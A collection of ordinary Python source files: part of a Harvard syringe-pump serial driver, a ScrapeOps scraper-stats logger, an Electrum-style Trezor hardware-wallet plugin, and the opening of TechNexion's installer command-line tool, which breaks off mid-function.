logging.error('%s: set syringe volume (%s %s) does not match'
'syringe volume returned by pump (%s %s)',
self.name, vol, unit, returned_volume, unit)
elif returned_volume == vol:
self.syringevolume = returned_volume
logging.info('%s: syringe volume set to %s %s', self.name,
self.syringevolume, convert_str_units(unit + "/min")[:2])
else:
raise PumpError('%s: unknown response' % self.name)
else:
print("Please wait until pump is idle.\n")
def getsyringevolume(self):
""" Gets syringe volume.
:return: str
"""
self.write('svolume')
resp = self.read(60)
matches = re.search(r"(\d+\.?\d*) ([mup][l])", resp)
if matches is None:
raise PumpError("Syringe volume could not be found")
else:
returned_volume = matches.group(1)
returned_unit = matches.group(2)
rtn_str = returned_volume + " " + returned_unit
return rtn_str
def stop(self):
"""Stop pump.
To be used in an emergency as pump should stop if target is reached.
"""
self.write('stop')
resp = self.read(5)
if resp[:3] != self.address + ":":
raise PumpError('%s: unexpected response to stop' % self.name)
else:
logging.info('%s: stopped',self.name)
self.state = "idle"
def cvolume(self):
""" Clears both withdrawn and infused volume """
self.civolume()
self.cwvolume()
def civolume(self):
""" Clears infused volume """
self.write('civolume')
def ctvolume(self):
""" Clears target volume """
self.write('ctvolume')
def cwvolume(self):
"""" Clears withdrawn volume """
self.write('cwvolume')
def ivolume(self):
""" Displays infused volume
:return: str
"""
self.write('ivolume')
resp = self.read(55)
matches = re.search(r"(\d+\.?\d*) ([mup][l])", resp)
if matches is not None:
return matches.group(1) + " " + matches.group(2)
else:
raise PumpError('%s: Unknown answer received' % self.name)
def wvolume(self):
""" Displays withdrawn volume
:return: str
"""
self.write('wvolume')
resp = self.read(55)
matches = re.search(r"(\d+\.?\d*) ([mup][l])", resp)
if matches is not None:
return matches.group(1) + " " + matches.group(2)
else:
raise PumpError('%s: Unknown answer received' % self.name)
class Pump2000(Pump):
""" Create pump object for Harvard PhD 2000 pump. """
def __init__(self, chain, address=00, name='PhD2000'):
self.name = name
self.serialcon = chain
self.address = '{0:02.0f}'.format(address)
self.diameter = None
self.flowrate = None
self.targetvolume = None
self.state = None
"""Query model and version number of firmware to check pump is
OK. Responds with a load of stuff, but the last three characters
are XXY, where XX is the address and Y is pump status. :, > or <
when stopped, running forwards, or running backwards. Confirm
that the address is correct. This acts as a check to see that
the pump is connected and working."""
try:
self.write('VER')
resp = self.read(17)
if 'PHD' not in resp:
raise PumpError('No response from pump at address %s' %
self.address)
if resp[-1] == ':':
self.state = 'idle'
elif resp[-1] == '>':
self.state = 'infusing'
elif resp[-1] == '<':
self.state = 'withdrawing'
elif resp[-1] == '*':
self.state = 'stalled'
else:
raise PumpError('%s: Unknown state encountered' % self.name)
except PumpError:
self.serialcon.close()
raise
logging.info('%s: created at address %s on %s', self.name,
self.address, self.serialcon.port)
def waituntilfinished(self):
""" Try to read pump state and return it. """
while self.state == "infusing" or self.state == "withdrawing":
try:
resp = self.read(5)
if '*' in resp:
self.state = "idle"
return "finished"
except:
pass
def run(self):
self.write('RUN')
resp = self.read(17)
self._errorcheck(resp)
self.state = 'infusing'
def rev(self):
self.write('REV')
resp = self.read(17)
self._errorcheck(resp)
self.state = 'withdrawing'
def infuse(self):
self.run()
if self.state == 'withdrawing':
self.stop()
self.rev()
def withdraw(self):
self.rev()
if self.state == 'infusing':
self.stop()
self.run()
def stop(self):
self.write('STP')
resp = self.read(17)
self._errorcheck(resp)
sleep(0.1)
if self.state == 'infusing' or self.state == 'withdrawing':
raise PumpError('%s: Pump could not be stopped.' % self.name)
def _errorcheck(self, resp):
if resp[-1] == ':':
self.state = 'idle'
elif resp[-1] == '>':
self.state = 'infusing'
elif resp[-1] == '<':
self.state = 'withdrawing'
elif resp[-1] == '*':
self.state = 'stalled'
else:
raise PumpError('%s: Unknown state encountered' % self.name)
def clear_accumulated_volume(self):
self.write('CLV')
resp = self.read(17)
self._errorcheck(resp)
def clear_target_volume(self):
self.write('CLT')
resp = self.read(17)
self._errorcheck(resp)
def set_rate(self, flowrate, units):
flowrate_str = "%4.4f" %flowrate
if units == 'm/m':
write_str = 'MLM'
elif units == 'u/m':
write_str = 'ULM'
elif units == 'm/h':
write_str = 'MLH'
self.rate_units = "ml/h"
elif units == 'u/h':
write_str = 'ULH'
else:
raise PumpError('%s: Unknown unit specified' % self.name)
self.write(write_str + flowrate_str)
resp = self.read(17)
self._errorcheck(resp)
def setdiameter(self, diameter):
self.write('MMD' + str(diameter))
resp = self.read(17)
self._errorcheck(resp)
def settargetvolume(self, volume):
""" Set target volume in mL. """
self.write('MLT' + str(volume))
resp = self.read(17)
self._errorcheck(resp)
def getdiameter(self):
self.write('DIA')
resp = self.read(17)
self._errorcheck(resp)
matches = re.search(r"(\d+\.?\d*)", resp)
if matches is not None:
return matches.group(1) + " mm"
else:
raise PumpError('%s: Unknown answer received' % self.name)
def getrate(self):
self.write('RAT')
resp = self.read(19)
self._errorcheck(resp)
matches = re.search(r"(\d+\.?\d*)", resp)
if matches is not None:
self.write('RNG')
resp = self.read(17)
self._errorcheck(resp)
return matches.group(1) + " " + resp[:4]
else:
raise PumpError('%s: Unknown answer received' % self.name)
def ivolume(self):
self.write('VOL')
resp = self.read(17)
self._errorcheck(resp)
matches = re.search(r"(\d+\.?\d*)", resp)
if matches is not None:
return matches.group(1) + " " + "ml"
else:
raise PumpError('%s: Unknown answer received' % self.name)
def gettargetvolume(self):
self.write('TAR')
resp = self.read(17)
self._errorcheck(resp)
matches = re.search(r"(\d+\.?\d*)", resp)
if matches is not None:
return matches.group(1) + " " + "ml"
else:
raise PumpError('%s: Unknown answer received' % self.name)
class PumpError(Exception):
pass |
scrapeops_logger.py | import logging
import threading
import time
from scrapeops_python_logger.core.controllers import SDKControllers
from scrapeops_python_logger.core.error_logger import TailLogger
from scrapeops_python_logger.stats.logger import StatsLogger
from scrapeops_python_logger.normalizer.request_response import SOPSResponse
from scrapeops_python_logger.stats.model import OverallStatsModel, PeriodicStatsModel
from scrapeops_python_logger.exceptions import ScrapeOpsMissingAPIKey, ScrapeOpsInvalidAPIKey
from scrapeops_python_logger.utils import utils
from scrapeops_python_logger.core.api import SOPSRequest
import atexit
class ScrapeOpsLogger(SDKControllers, StatsLogger):
def __init__(self,
scrapeops_api_key=None,
spider_name=None,
job_name=None,
job_version=None,
custom_groups=None,
logger_name=None,
## SOPS
sop_debug=False,
sops_endpoint=None):
SDKControllers.__init__(self)
StatsLogger.__init__(self)
## Error/Warning Logger
self.tail = TailLogger()
log_handler = self.tail.log_handler
if(logger_name != None):
logging.getLogger(logger_name).addHandler(log_handler)
else:
logging.getLogger().addHandler(log_handler)
#Periodic Details
self.daemon_thread = None
self.last_run = 0
self.thread_active = True
self.sleep_frequency = 0.5
## Job Details
self.spider_name = spider_name
self.job_group_name = job_name
self.job_group_version = job_version
self.job_custom_groups = custom_groups
## Logger Setup Data
self._scrapeops_api_key = scrapeops_api_key
self._scrapeops_debug_mode = sop_debug
SOPSRequest.set_sops_endpoint(sops_endpoint)
SOPSRequest.set_sops_api_key(scrapeops_api_key)
self.start_sdk()
def start_sdk(self, spider=None, crawler=None):
self.start_time = self.period_start_time = utils.current_time()
self._scrapeops_job_start = utils.current_time()
if self.check_api_key_present():
self.initialize_SDK()
self.send_setup_request()
if self._scrapeops_api_key_valid:
self.spider_open_stats()
self.start_periodic_monitor()
atexit.register(self.close_sdk)
else:
print("ScrapeOps API Key Invalid")
err = ScrapeOpsInvalidAPIKey()
self.deactivate_sdk(reason='invalid_api_key', error=err)
else:
print("ScrapeOps API Key Missing or Incorrect")
err = ScrapeOpsMissingAPIKey()
self.deactivate_sdk(reason='no_api_key', error=err)
raise err
#PERIODIC 1st function
def start_periodic_monitor(self):
self.daemon_thread = threading.Thread(target=self.scheduler_controller, daemon=True)
self.daemon_thread.start()
#PERIODIC 2nd function
def scheduler_controller(self):
while self.thread_active == True:
time.sleep(self.sleep_frequency)
self.last_run += self.sleep_frequency
#send stats
period_time = utils.current_time()
if self.get_runtime(time=period_time) % self.get_periodic_frequency() == 0:
self.period_finish_time = utils.current_time()
if self.sdk_enabled():
self.spider_close_stats()
self.aggregate_stats(crawler=None, middleware=False)
self.send_stats(periodic_stats=PeriodicStatsModel._periodic_stats, overall_stats=OverallStatsModel._overall_stats, stats_type='periodic', reason='periodic')
self.reset_periodic_stats()
self.period_start_time = utils.current_time()
self.inc_value(OverallStatsModel._overall_stats, 'periodic_runs')
elif self.periodic_monitor_active():
self.close_periodic_monitor()
def close_periodic_monitor(self):
self.thread_active = False
def get_periodic_frequency(self):
self.period_count = 0
runtime = self.get_runtime()
if self._period_freq_list is None:
self.period_count = int(runtime//self._period_frequency)
return self._period_frequency
for index, row in enumerate(self._period_freq_list):
if runtime > int(row.get('total_time')):
if index == 0:
period_time = row.get('total_time')
else:
period_time = row.get('total_time') - self._period_freq_list[index - 1].get('total_time')
self.period_count += int(period_time/row.get('periodic_frequency'))
if runtime <= int(row.get('total_time')):
self._period_frequency = row.get('periodic_frequency')
if index == 0:
diff = runtime
else:
diff = runtime - int(self._period_freq_list[index - 1].get('total_time'))
self.period_count += int(diff//self._period_frequency)
return self._period_frequency
return self._period_frequency
def get_runtime(self, time=None):
if time is None:
return utils.current_time() - self._scrapeops_job_start
return time - self._scrapeops_job_start
def close_sdk(self):
if self.sdk_enabled():
self.period_finish_time = utils.current_time()
self.spider_close_stats("Finished")
self.send_stats(periodic_stats=PeriodicStatsModel._periodic_stats, overall_stats=OverallStatsModel._overall_stats, stats_type='finished', reason='finished')
self.close_periodic_monitor()
self.display_overall_stats()
def log_request(self, request_response_object=None):
if self.sdk_enabled():
self.request_response_middleware.normalise_domain_proxy_data(request_response_object)
self.generate_request_stats(request_response_object)
def log_response(self, request_response_object=None):
if self.sdk_enabled():
self.request_response_middleware.process(request_response_object)
self.generate_response_stats(request_response_object)
def item_scraped(self, response=None, item=None):
if self.sdk_enabled():
if isinstance(response, SOPSResponse):
self.request_response_middleware.normalise_domain_proxy_data(response)
self.item_validation_middleware.validate(response, item)
self.generate_item_stats(response, signal='item_scraped')
def item_dropped(self, response=None, item=None, message=None):
if self.sdk_enabled():
if isinstance(response, SOPSResponse):
self.request_response_middleware.normalise_domain_proxy_data(response)
self.generate_item_stats(response, signal='item_dropped')
## log the dropped item
def item_error(self, response=None, item=None, message=None, error=None):
if self.sdk_enabled():
if isinstance(response, SOPSResponse):
self.request_response_middleware.normalise_domain_proxy_data(response)
self.generate_item_stats(response, signal='item_error')
## log the item error
def sdk_enabled(self):
return self._sdk_active or False
|
trezor.py | import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device, runs_in_hwd_thread
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException,
get_xpubs_and_der_suffixes_from_txinout)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
Capability, BackupType, RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, AmountUnit)
from trezorlib.client import PASSPHRASE_ON_DEVICE
TREZORLIB = True
except Exception as e:
if not (isinstance(e, ModuleNotFoundError) and e.name == 'trezorlib'):
_logger.exception('error importing trezor plugin deps')
TREZORLIB = False
class _EnumMissing:
def __init__(self):
self.counter = 0
self.values = {}
def __getattr__(self, key):
if key not in self.values:
self.values[key] = self.counter
self.counter += 1
return self.values[key]
Capability = _EnumMissing()
BackupType = _EnumMissing()
RecoveryDeviceType = _EnumMissing()
AmountUnit = _EnumMissing()
PASSPHRASE_ON_DEVICE = object()
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
plugin: 'TrezorPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None:
raise UserFacingException(_('Missing previous tx.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
backup_type: int = BackupType.Bip39
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://pypi.org/project/trezor/'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 13, 0)
maximum_library = (0, 14)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
self._is_bridge_available = None
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
@runs_in_hwd_thread
def is_bridge_available(self) -> bool:
# Testing whether the Bridge is available can take several seconds
# (when it is not), as it is slow to timeout, hence we cache it.
if self._is_bridge_available is None:
try:
call_bridge("enumerate")
except Exception:
self._is_bridge_available = False
# never again try with Bridge due to slow timeout
BridgeTransport.ENABLED = False
else:
self._is_bridge_available = True
return self._is_bridge_available
@runs_in_hwd_thread
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
if self.is_bridge_available():
devices = BridgeTransport.enumerate()
else:
devices = trezorlib.transport.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
@runs_in_hwd_thread
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['TrezorClientBase']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Sapphire"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.").format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RecoveryDeviceType.ScrambledWords:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 20: 128, 24: 256, 33: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
backup_type=settings.backup_type,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RecoveryDeviceType.Matrix:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub('m', 'standard', creating=is_creating_wallet))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return InputScriptType.SPENDMULTISIG
if electrum_txin_type in ('p2tr',):
return InputScriptType.SPENDTAPROOT
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return OutputScriptType.PAYTOMULTISIG
if electrum_txin_type in ('p2tr',):
return OutputScriptType.PAYTOTAPROOT
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_amount_unit(self):
if self.config.decimal_point == 0:
return AmountUnit.SATOSHI
elif self.config.decimal_point == 2:
return AmountUnit.MICROBITCOIN
elif self.config.decimal_point == 5:
return AmountUnit.MILLIBITCOIN
else:
return AmountUnit.BITCOIN
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
prev_tx = {bfh(txhash): self.electrum_tx_to_txtype(tx) for txhash, tx in prev_tx.items()}
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures, _ = client.sign_tx(self.get_coin_name(),
inputs, outputs,
lock_time=tx.locktime,
version=tx.version,
amount_unit=self.get_trezor_amount_unit(),
prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'TrezorKeyStore' = None):
inputs = []
for txin in tx.inputs():
if txin.is_coinbase_input():
txinputtype = TxInputType(
prev_hash=b"\x00"*32,
prev_index=0xffffffff, # signed int -1
)
else:
txinputtype = TxInputType(
prev_hash=txin.prevout.txid,
prev_index=txin.prevout.out_idx,
)
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
txinputtype.multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
txinputtype.script_type = self.get_trezor_input_script_type(txin.script_type)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n = full_path
txinputtype.amount = txin.value_sats()
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'TrezorKeyStore'):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
if address:
return TxOutputType(
amount=txout.value,
script_type=OutputScriptType.PAYTOADDRESS,
address=address,
)
else:
return TxOutputType(
amount=txout.value,
script_type=OutputScriptType.PAYTOOPRETURN,
op_return_data=trezor_validate_op_return_output_and_get_data(txout),
)
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
t.inputs = self.tx_inputs(tx)
t.bin_outputs = [
TxOutputBinType(amount=o.value, script_pubkey=o.scriptpubkey)
for o in tx.outputs()
]
return t
|
installer.py | # Copyright (c) 2018 TechNexion,Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. The names of the authors may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESSED OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
# TECHNEXION, INC. OR ANY CONTRIBUTORS TO THIS SOFTWARE BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
# installer:
# The client CLI program for the TechNexion Installer/Rescue system
#
# Author: Po Cheng <po.cheng@technexion.com>
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#----------------------------------------------------------
# installer cli
#
# To run the installer cli commands, type in the shell
#
# $ installer.py help
#
# for help usage of the installer cli tool
#
#----------------------------------------------------------
import re
import time
import math
import logging
import subprocess
from threading import Thread, Event
from urllib.parse import urlparse
from defconfig import SetupLogging
from view import CliViewer
SetupLogging('/tmp/installer_cli.log')
_logger = logging.getLogger(__name__)
_logger.setLevel(logging.DEBUG)
def _prettySize(n,pow=0,b=1024,u='B',pre=['']+[p+'i'for p in'KMGTPEZY']):
r,f=min(int(math.log(max(n*b**pow,1),b)),len(pre)-1),'{:,.%if} %s%s'
return (f%(abs(r%(-r-1)),pre[r],u)).format(n*b**pow/b**float(r))
def findAttrs(keys, dc):
"""
For dictionary and dictionary within a dictionary
"""
for k, v in dc.items():
if k in keys:
yield (k, v)
elif isinstance(v, dict):
for ret in findAttrs(keys, v):
yield ret
def parsePartitionSize(result):
# parse the returned partitions and send them off
if isinstance(result, dict) and 'status' in result and result['status'] == "success":
for k, v in result.items():
if isinstance(v, dict) and 'device_type' in v.keys() and v['device_type'] == 'partition' and \
'sys_number' in v.keys() and int(v['sys_number']) == 1 and \
'sys_name' in v.keys() and 'mmcblk' in v['sys_name'] and \
'attributes' in v.keys() and isinstance(v['attributes'], dict) and \
'size' in v['attributes'].keys() and 'start' in v['attributes'].keys():
return int((int(v['attributes']['start']) + int(v['attributes']['size']) + 8) / 4096 * 512) # add an additional block, i.e 4096/512
def parseTargetList(result):
data = {}
for k, v in result.items():
if isinstance(v, dict):
data.update({k: {att[0]:att[1] for att in findAttrs(['device_node', 'size'], v)}})
return [(i, k, v) for i, (k, v) in enumerate(data.items())]
def parseWebList(result):
if 'file_list' in result and isinstance(result['file_list'], dict):
# We know that file_list is a dictionary because we send it from the server
return [(i, k, v) for i, (k, v) in enumerate(sorted(result['file_list'].items()))]
def checkUrl(url):
try:
result = urlparse(url)
return result if all([result.scheme, result.netloc]) else None
except:
return None
def crawlWeb(link, result):
# print('link: {}'.format(link))
cliWeb = CliViewer()
print('Search http://rescue.technexion.net{}'.format(link))
cliWeb.request({'cmd': 'info', 'target': 'http://rescue.technexion.net', 'location': link })
parsedList = parseWebList(cliWeb.getResult())
del cliWeb
for i in parsedList:
if i[1].endswith('/'):
pobj = checkUrl(i[2])
if pobj is not None:
crawlWeb(pobj.path.replace('/rescue/', '/'), result)
elif i[1].endswith('.xz'):
result.update({link+i[1]: i[2]})
def loopResult(viewer, ev):
while not ev.wait(1):
result = viewer.queryResult()
if 'total_uncompressed' in result:
total = int(result['total_uncompressed'])
elif 'total_size' in result:
total = int(result['total_size'])
